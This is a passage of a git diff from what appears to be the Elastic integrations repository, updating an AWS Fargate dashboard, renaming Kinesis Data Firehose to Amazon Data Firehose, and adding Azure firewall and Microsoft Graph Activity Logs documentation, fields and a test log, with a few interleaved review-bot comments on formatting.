"ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DiskIO Write", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.diskio.write.bytes" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", - "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { + "columnOrder": [ + "0505d890-632e-4434-a68f-f019e7893eaf", + "989ce63a-7fcd-4c83-980b-d595a1dd2469", + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + "columns": { + "0505d890-632e-4434-a68f-f019e7893eaf": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of awsfargate.task_stats.identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", + "type": "column" + }, + "orderDirection": 
"desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + }, + "989ce63a-7fcd-4c83-980b-d595a1dd2469": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "DiskIO Read", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.diskio.read.bytes" + } } + } } + } }, - "title": "DiskIO Write [Metrics AWSFargate]", - "type": "lens", - "visualizationType": "lnsXY" + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" + ], + "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", + "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "DiskIO Read [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "DiskIO Read" }, - "gridData": { + { + "type": "lens", + "gridData": { 
"h": 15, - "i": "89b0cd8b-13d9-4a43-8f93-3410aff125c3", + "i": "d10ca3b7-2b7c-44e3-9ea6-aba407a6a68f", "w": 24, "x": 24, "y": 44 - }, - "panelIndex": "89b0cd8b-13d9-4a43-8f93-3410aff125c3", - "title": "DiskIO Write", - "type": "lens", - "version": "8.3.0" - } + }, + "panelIndex": "d10ca3b7-2b7c-44e3-9ea6-aba407a6a68f", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { + "columnOrder": [ + "0505d890-632e-4434-a68f-f019e7893eaf", + "989ce63a-7fcd-4c83-980b-d595a1dd2469", + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" + ], + "columns": { + "0505d890-632e-4434-a68f-f019e7893eaf": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of awsfargate.task_stats.identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + }, + "989ce63a-7fcd-4c83-980b-d595a1dd2469": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "DiskIO Write", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.diskio.write.bytes" + } + } + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + 
"query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" + ], + "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", + "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "DiskIO Write [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "title": "DiskIO Write" + } ], "timeRestore": false, "title": "[AWS Fargate] Fargate Overview", "version": 1 }, - "coreMigrationVersion": "8.3.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2023-10-19T15:29:21.489Z", "id": "awsfargate-20dc7c50-2e89-11eb-991c-c5fd3b7f5a63", - "migrationVersion": { - "dashboard": "8.3.0" - }, + "managed": false, "references": [ { "id": "metrics-*", - "name": "735a25cb-f781-4a8b-99e6-2adf582f8a37:indexpattern-datasource-current-indexpattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern" }, { "id": "metrics-*", - "name": "735a25cb-f781-4a8b-99e6-2adf582f8a37:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "name": "dce84c11-4c70-448f-86c4-820b164072b6:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", "type": "index-pattern" }, { "id": "metrics-*", - "name": "5d4537e8-9aee-47e6-8580-1961d8a3a38e:indexpattern-datasource-current-indexpattern", + "name": 
"e609f80a-d1b2-4820-a896-a8a68a731ed0:indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", "type": "index-pattern" }, { "id": "metrics-*", - "name": "5d4537e8-9aee-47e6-8580-1961d8a3a38e:indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", + "name": "3607122f-df09-4aa9-b42c-8f58d334e7c8:indexpattern-datasource-current-indexpattern", "type": "index-pattern" }, { "id": "metrics-*", - "name": "d3c9208e-c699-4514-a091-a731d28ab9af:indexpattern-datasource-current-indexpattern", + "name": "3607122f-df09-4aa9-b42c-8f58d334e7c8:indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", "type": "index-pattern" }, { "id": "metrics-*", - "name": "d3c9208e-c699-4514-a091-a731d28ab9af:indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", + "name": "18d073d9-fbd7-42fd-b157-4721e4c810d7:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", "type": "index-pattern" }, { "id": "metrics-*", - "name": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7:indexpattern-datasource-current-indexpattern", + "name": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612:indexpattern-datasource-current-indexpattern", "type": "index-pattern" }, { "id": "metrics-*", - "name": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7:indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "name": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612:indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", "type": "index-pattern" }, { "id": "metrics-*", - "name": "a7a6e425-98fd-4210-b3d5-005268be6274:indexpattern-datasource-current-indexpattern", + "name": "9131626b-0386-4f36-838d-0c5615e74279:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", "type": "index-pattern" }, { "id": "metrics-*", - "name": "a7a6e425-98fd-4210-b3d5-005268be6274:indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", + "name": "d10ca3b7-2b7c-44e3-9ea6-aba407a6a68f:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", "type": "index-pattern" }, { 
"id": "metrics-*", - "name": "d7a6623a-14cf-411c-ab73-ded3734a359b:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "name": "controlGroup_17bd1c1a-3360-43ae-90d7-f4ad286bbbce:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "89b0cd8b-13d9-4a43-8f93-3410aff125c3:indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", + "name": "controlGroup_97e445ae-63fe-4841-a7f9-cac0071c336b:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "controlGroup_ee100059-0e56-4e9b-ae09-ff53234bdf8c:optionsListDataView", + "name": "controlGroup_12d08143-512a-4a8a-ae17-101d4786f7c1:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "controlGroup_e967cd1f-7491-4e72-8d63-23fcef40b9cc:optionsListDataView", + "name": "controlGroup_5bf10aa8-18dc-488b-a012-d7391b591685:optionsListDataView", "type": "index-pattern" }, { "id": "metrics-*", - "name": "controlGroup_b2adcf17-72de-46e8-87b1-94c16c399bf0:optionsListDataView", + "name": "controlGroup_257ac79f-80db-4f65-b10a-b680c7f217e1:optionsListDataView", "type": "index-pattern" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/awsfargate/manifest.yml b/packages/awsfargate/manifest.yml index 4bea0dd8dd8..d2741e06c87 100644 --- a/packages/awsfargate/manifest.yml +++ b/packages/awsfargate/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: awsfargate title: AWS Fargate -version: "0.4.0" +version: 1.0.0 description: Collects metrics from containers and tasks running on Amazon ECS clusters with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - aws conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic owner: 
@@ -18,7 +18,7 @@ owner: screenshots: - src: /img/awsfargate-integration-overview.png title: awsfargate integration overview - size: 5108x2522 + size: 2171x2749 type: image/png icons: - src: /img/logo_fargate.svg diff --git a/packages/awsfirehose/_dev/build/docs/README.md b/packages/awsfirehose/_dev/build/docs/README.md index ac88e3abe11..72af9cdfba1 100644 --- a/packages/awsfirehose/_dev/build/docs/README.md +++ b/packages/awsfirehose/_dev/build/docs/README.md @@ -1,5 +1,5 @@ -# Amazon Kinesis Data Firehose -Amazon Kinesis Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. +# Amazon Data Firehose +Amazon Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. This integration includes predefined rules that automatically route AWS service logs to the respective integrations, which include field mappings, ingest pipelines, predefined dashboards and ect. Here is a list of log types that are supported by this integration: @@ -34,12 +34,12 @@ This is a current limitation in Firehose, which we are working with AWS to resol ![Install AWS assets](../img/install-assets.png) -2. Create a delivery stream in Amazon Kinesis Data Firehose +2. Create a delivery stream in Amazon Data Firehose - Sign into the AWS console and navigate to Amazon Kinesis. Click **Create delivery stream**. + Sign into the AWS console and navigate to Amazon Data Firehose. Click **Create Firehose stream**. Configure the delivery stream using the following settings: - ![Amazon Kinesis Data Firehose](../img/aws-firehose.png) + ![Amazon Data Firehose](../img/aws-firehose.png) **Choose source and destination** diff --git a/packages/awsfirehose/changelog.yml b/packages/awsfirehose/changelog.yml index bbb3cea8a24..4c93b452938 100644 --- a/packages/awsfirehose/changelog.yml +++ b/packages/awsfirehose/changelog.yml 
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: 0.6.0
+ changes:
+ - description: Rename Amazon Kinesis Data Firehose to Amazon Data Firehose
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9462
 - version: 0.5.0
 changes:
 - description: Update the package format_version to 3.0.0.
diff --git a/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml b/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml
index bd196c5bb35..cbcb28989ba 100644
--- a/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/awsfirehose/data_stream/logs/elasticsearch/ingest_pipeline/default.yml
@@ -1,5 +1,5 @@
 ---
-description: Pipeline for rerouting logs streams from Amazon Kinesis Data Firehose.
+description: Pipeline for rerouting logs streams from Amazon Data Firehose.
 processors:
 - set:
 field: ecs.version
diff --git a/packages/awsfirehose/data_stream/logs/manifest.yml b/packages/awsfirehose/data_stream/logs/manifest.yml
index 5d9e518c57f..d010a4d66c0 100644
--- a/packages/awsfirehose/data_stream/logs/manifest.yml
+++ b/packages/awsfirehose/data_stream/logs/manifest.yml
@@ -1,4 +1,4 @@
-title: Logs from Amazon Kinesis Data Firehose
+title: Logs from Amazon Data Firehose
 type: logs
 dataset: awsfirehose
 # This integration includes predefined rules that automatically route AWS service logs to the respective integrations.
diff --git a/packages/awsfirehose/docs/README.md b/packages/awsfirehose/docs/README.md
index ac88e3abe11..72af9cdfba1 100644
--- a/packages/awsfirehose/docs/README.md
+++ b/packages/awsfirehose/docs/README.md
@@ -1,5 +1,5 @@ -# Amazon Kinesis Data Firehose -Amazon Kinesis Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. +# Amazon Data Firehose +Amazon Data Firehose integration offers users a way to stream logs from Firehose to Elastic Cloud. This integration includes predefined rules that automatically route AWS service logs to the respective integrations, which include field mappings, ingest pipelines, predefined dashboards and ect. Here is a list of log types that are supported by this integration: @@ -34,12 +34,12 @@ This is a current limitation in Firehose, which we are working with AWS to resol ![Install AWS assets](../img/install-assets.png) -2. Create a delivery stream in Amazon Kinesis Data Firehose +2. Create a delivery stream in Amazon Data Firehose - Sign into the AWS console and navigate to Amazon Kinesis. Click **Create delivery stream**. + Sign into the AWS console and navigate to Amazon Data Firehose. Click **Create Firehose stream**. Configure the delivery stream using the following settings: - ![Amazon Kinesis Data Firehose](../img/aws-firehose.png) + ![Amazon Data Firehose](../img/aws-firehose.png) **Choose source and destination** diff --git a/packages/awsfirehose/img/aws-firehose.png b/packages/awsfirehose/img/aws-firehose.png index b3fb863df1f..66171a6c6db 100644 Binary files a/packages/awsfirehose/img/aws-firehose.png and b/packages/awsfirehose/img/aws-firehose.png differ diff --git a/packages/awsfirehose/manifest.yml b/packages/awsfirehose/manifest.yml index c7d1068f794..864a79d427d 100644 --- a/packages/awsfirehose/manifest.yml +++ b/packages/awsfirehose/manifest.yml 
@@ -1,8 +1,8 @@
 format_version: "3.0.0"
 name: awsfirehose
-title: Amazon Kinesis Data Firehose
-version: 0.5.0
-description: Stream logs from Amazon Kinesis Data Firehose into Elastic Cloud.
+title: Amazon Data Firehose
+version: 0.6.0
+description: Stream logs from Amazon Data Firehose into Elastic Cloud.
 type: integration
 categories:
 - observability
diff --git a/packages/azure/_dev/build/docs/README.md b/packages/azure/_dev/build/docs/README.md
index 74a25217402..3c5d32d8c17 100644
--- a/packages/azure/_dev/build/docs/README.md
+++ b/packages/azure/_dev/build/docs/README.md
@@ -1,6 +1,6 @@
 # Azure Logs Integration
-The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, and several others using the Activity and Platform logs.
+The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, Microsoft Graph Activity, and several others using the Activity and Platform logs.
 You can then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue.
@@ -16,7 +16,7 @@ fail to start due to an exceed quota limit.
 The Azure Logs integration collects logs. **Logs** help you keep a record of events that happen on your Azure account.
-Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), and Spring Apps logs.
+Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), Microsoft Graph Activity, and Spring Apps logs.
 ## Requirements
@@ -266,6 +266,59 @@ The Elastic Agent can use one Storage account container for all integrations. The Agent will use the integration name and the event hub name to identify the blob to store the consumer group information uniquely. +### Running the integration behind a firewall + +When you run the Elastic Agent behind a firewall, to ensure proper communication with the necessary components, you need to allow traffic on port `5671` and `5672` for the Event Hub, and port `443` for the Storage Account container. + +```text +┌────────────────────────────────┐ ┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ │ │ +│ ┌────────────┐ ┌───────────┐ │ │ ┌──────────────┐ │ │ ┌───────────────┐ │ +│ │ diagnostic │ │ event hub │ │ │ │azure-eventhub│ │ │ │ activity logs │ │ +│ │ setting │──▶│ │◀┼AMQP─│ <> │─┼──┼▶│<>│ │ +│ └────────────┘ └───────────┘ │ │ └──────────────┘ │ │ └───────────────┘ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ ┌─────────────┬─────HTTPS─┼──────────┘ │ │ │ +│ ┌───────┼─────────────┼──────┐ │ │ │ │ │ +│ │ │ │ │ │ │ │ │ │ +│ │ ▼ ▼ │ │ └─Agent─────────────┘ └─Elastic Cloud─────┘ +│ │ ┌──────────┐ ┌──────────┐ │ │ +│ │ │ 0 │ │ 1 │ │ │ +│ │ │ <> │ │ <> │ │ │ +│ │ └──────────┘ └──────────┘ │ │ +│ │ │ │ +│ │ │ │ +│ └─Storage Account Container──┘ │ +│ │ +│ │ +└─Azure──────────────────────────┘ +``` + +#### Event Hub + +Port `5671` and `5672` are commonly used for secure communication with the Event Hub. These ports are used to receive events. By allowing traffic on these ports, the Elastic Agent can establish a secure connection with the Event Hub. + +For more information, check the following documents: + +- [What ports do I need to open on the firewall?](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall) from the [Event Hubs frequently asked questions](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall). 
+- [AMQP outbound port requirements](https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-amqp-protocol-guide#amqp-outbound-port-requirements)
+
+#### Storage Account Container
+
+Port `443` is used for secure communication with the Storage Account container. This port is commonly used for HTTPS traffic. By allowing traffic on port 443, the Elastic Agent can securely access and interact with the Storage Account container, which is essential for storing and retrieving checkpoint data for each event hub partition.
+
+#### DNS
+
+Optionally, you can restrict the traffic to the following domain names:
+
+```text
+*.servicebus.windows.net
+*.blob.core.windows.net
+*.cloudapp.net
+```
+
 ## Settings
 Use the following settings to configure the Azure Logs integration when you add it to Fleet.
diff --git a/packages/azure/_dev/build/docs/graphactivitylogs.md b/packages/azure/_dev/build/docs/graphactivitylogs.md
new file mode 100644
index 00000000000..7a93a6faef9
--- /dev/null
+++ b/packages/azure/_dev/build/docs/graphactivitylogs.md
@@ -0,0 +1,84 @@ +# Microsoft Graph Activity Logs + +Microsoft Graph Activity Logs provide an audit trail of all HTTP requests that the Microsoft Graph service has received and processed for a tenant. Microsoft Graph Activity Logs gives full visibility into all transactions made by applications and other API clients that you have consented to in the tenant. Refer to [Microsoft Graph Activity Common Usecases](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#common-use-cases-for-microsoft-graph-activity-logs) for more use cases. + +Tenant administrators can configure the collection and storage destinations of Microsoft Graph Activity Logs through Diagnostic Setting in the Entra Portal. This integration uses Azure Event Hubs destination to stream Microsoft Graph Activity Logs to Elastic. + +## Requirements and Setup + +### Prerequisites + +Following privileges are required to collect Microsoft Graph Activity Logs: +- A Microsoft Entra ID P1 or P2 tenant license in your tenant. +- A `Security Administrator` or `Global Administrator` Microsoft Entra ID role to configure the diagnostic settings. +Refer to [Microsoft Graph Prerequisites](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#prerequisites) for more information on required privileges. + +### Setup + +Refer to the [Azure Logs](https://docs.elastic.co/integrations/azure) page for more information about setting up and using this integration. + +### Limitations + +- Activities of multi-tenant applications belonging to another tenant are not available. +- In few rare cases, events might take up to 2 hours to be delivered to Event Hubs. +Refer to [Microsoft Graph Activity Limitations](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#limitations) for more information. + +## Settings + +`eventhub` : + _string_ +It is a fully managed, real-time data ingestion service. 
Elastic recommends using only letters, numbers, and the hyphen (-) character for Event Hub names to maximize compatibility. You _can_ use existing Event Hubs having underscores (_) in the Event Hub name; in this case, the integration will replace underscores with hyphens (-) when it uses the Event Hub name to create dependent Azure resources behind the scenes (e.g., the storage account container to store Event Hub consumer offsets). Elastic also recommends using a separate event hub for each log type as the field mappings of each log type differ. +Default value `insights-operational-logs`. + +`consumer_group` : +_string_ + The publish/subscribe mechanism of Event Hubs is enabled through consumer groups. A consumer group is a view (state, position, or offset) of an entire event hub. Consumer groups enable multiple consuming applications to each have a separate view of the event stream, and to read the stream independently at their own pace and with their own offsets. +Default value: `$Default` + +`connection_string` : +_string_ +The connection string required to communicate with Event Hubs, steps [here](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-get-connection-string). + +A Blob Storage account is required in order to store/retrieve/update the offset or state of the eventhub messages. This means that after stopping the filebeat azure module it can start back up at the spot that it stopped processing messages. + +`storage_account` : +_string_ +The name of the storage account the state/offsets will be stored and updated. + +`storage_account_key` : +_string_ +The storage account key, this key will be used to authorize access to data in your storage account. + +`storage_account_container` : +_string_ +The storage account container where the integration stores the checkpoint data for the consumer group. It is an advanced option to use with extreme care. 
You MUST use a dedicated storage account container for each Azure log type (activity, sign-in, audit logs, and others). DO NOT REUSE the same container name for more than one Azure log type. See [Container Names](https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names) for details on naming rules from Microsoft. The integration generates a default container name if not specified. + +`resource_manager_endpoint` : +_string_ +Optional, by default we are using the azure public environment, to override, users can provide a specific resource manager endpoint in order to use a different Azure environment. + +Resource manager endpoints: + +```text +# Azure ChinaCloud +https://management.chinacloudapi.cn/ + +# Azure GermanCloud +https://management.microsoftazure.de/ + +# Azure PublicCloud +https://management.azure.com/ + +# Azure USGovernmentCloud +https://management.usgovcloudapi.net/ +``` + +## Logs + +### graphactivitylogs + +The `graphactivitylogs` data stream of the Azure Logs package will collect Microsoft Graph activity events that have been streamed through an azure event hub. + +{{event "graphactivitylogs"}} + +{{fields "graphactivitylogs"}} diff --git a/packages/azure/changelog.yml b/packages/azure/changelog.yml index b7e611cb973..f10be2f4c0c 100644 --- a/packages/azure/changelog.yml +++ b/packages/azure/changelog.yml 
@@ -1,3 +1,28 @@
+- version: "1.11.0"
+ changes:
+ - description: Use ecs definition of the 'event.dataset' field for eventhub
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9554
+- version: "1.10.0"
+ changes:
+ - description: Add Microsoft Graph Activity Logs
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9314
+- version: "1.9.2"
+ changes:
+ - description: Add docs for running the integration behind a firewall.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9158
+- version: "1.9.1"
+ changes:
+ - description: Set field type to password on secret fields.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9159
+- version: "1.9.0"
+ changes:
+ - description: Add support for integration secrets
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9022
 - version: "1.8.3"
 changes:
 - description: Add caller_ip_address field in pipeline for Azure sign-in logs.
diff --git a/packages/azure/data_stream/auditlogs/fields/fields.yml b/packages/azure/data_stream/auditlogs/fields/fields.yml
index 9541945724e..c725d0c8197 100644
--- a/packages/azure/data_stream/auditlogs/fields/fields.yml
+++ b/packages/azure/data_stream/auditlogs/fields/fields.yml
@@ -152,6 +152,12 @@
 - name: user_agent
 type: keyword
 description: User agent name.
+ - name: key
+ type: keyword
+ description: Additional details key
+ - name: value
+ type: keyword
+ description: Additional details value
 - name: authentication_protocol
 type: keyword
 description: Authentication protocol type.
diff --git a/packages/azure/data_stream/eventhub/fields/base-fields.yml b/packages/azure/data_stream/eventhub/fields/base-fields.yml
index 99d3c84233f..005699cf6bf 100644
--- a/packages/azure/data_stream/eventhub/fields/base-fields.yml
+++ b/packages/azure/data_stream/eventhub/fields/base-fields.yml
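Review bot: The two new field descriptions in the auditlogs `fields.yml` hunk, `Additional details key` and `Additional details value`, omit the trailing period that the neighbouring entries carry (`User agent name.`, `Authentication protocol type.`); make them `description: Additional details key.` and `description: Additional details value.` so the generated field reference stays consistent. The field group these two leaves belong to opens before the hunk, so the intended parent object cannot be confirmed from here.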
@@ -14,7 +14,3 @@
 type: constant_keyword
 description: Event module
 value: azure
-- name: event.dataset
- type: constant_keyword
- description: Event dataset
- value: azure.eventhub
diff --git a/packages/azure/data_stream/eventhub/fields/ecs.yml b/packages/azure/data_stream/eventhub/fields/ecs.yml
index de00d49d7d7..08590c49910 100644
--- a/packages/azure/data_stream/eventhub/fields/ecs.yml
+++ b/packages/azure/data_stream/eventhub/fields/ecs.yml
@@ -44,6 +44,8 @@
 external: ecs
 - name: event.type
 external: ecs
+- external: ecs
+ name: event.dataset
 - name: file.mime_type
 external: ecs
 - name: file.size
diff --git a/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log
new file mode 100644
index 00000000000..bbd6318d87a
--- /dev/null
+++ b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log
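Review bot: The new `event.dataset` entry in `ecs.yml` is written key-first as `- external: ecs` then `name: event.dataset`, the reverse of every sibling in the hunk (`- name: event.type` then `external: ecs`); write it as `- name: event.dataset` followed by `  external: ecs` so the list stays uniform. Because the preceding `base-fields.yml` hunk drops the `constant_keyword` definition that pinned `value: azure.eventhub`, the field becomes a plain ECS keyword that is only populated when the input or pipeline sets it per document; the code that would set it is not visible here, so that part is inferred. Any saved search or detection rule that filters on `event.dataset: azure.eventhub` should be checked against a live document after this change.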
@@ -0,0 +1,5 @@ +{"Level":4,"callerIpAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","category":"MicrosoftGraphActivityLogs","correlationId":"f7739da0-e6d1-4e3f-985a-64937fbge347","durationMs":462680,"location":"West Europe","operationName":"Microsoft Graph Activity","operationVersion":"v1.0","properties":{"apiVersion":"v1.0","appId":"a5a68e12-268a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"2","clientRequestId":"2fe56789-a848-4c93-9d2c-5675972aejk9","durationMs":462680,"identityProvider":"https://sts.windows.net/a140785b-418d-4344-a4ec-8e9648919gdb/","ipAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","location":"West Europe","operationId":"f7739da0-e6d1-4e3f-985a-64937fbge347","requestId":"f7739da0-e6d1-4e3f-985a-64937fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb?$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary","responseSizeBytes":364,"responseStatusCode":200,"roles":"Organization.Read.All 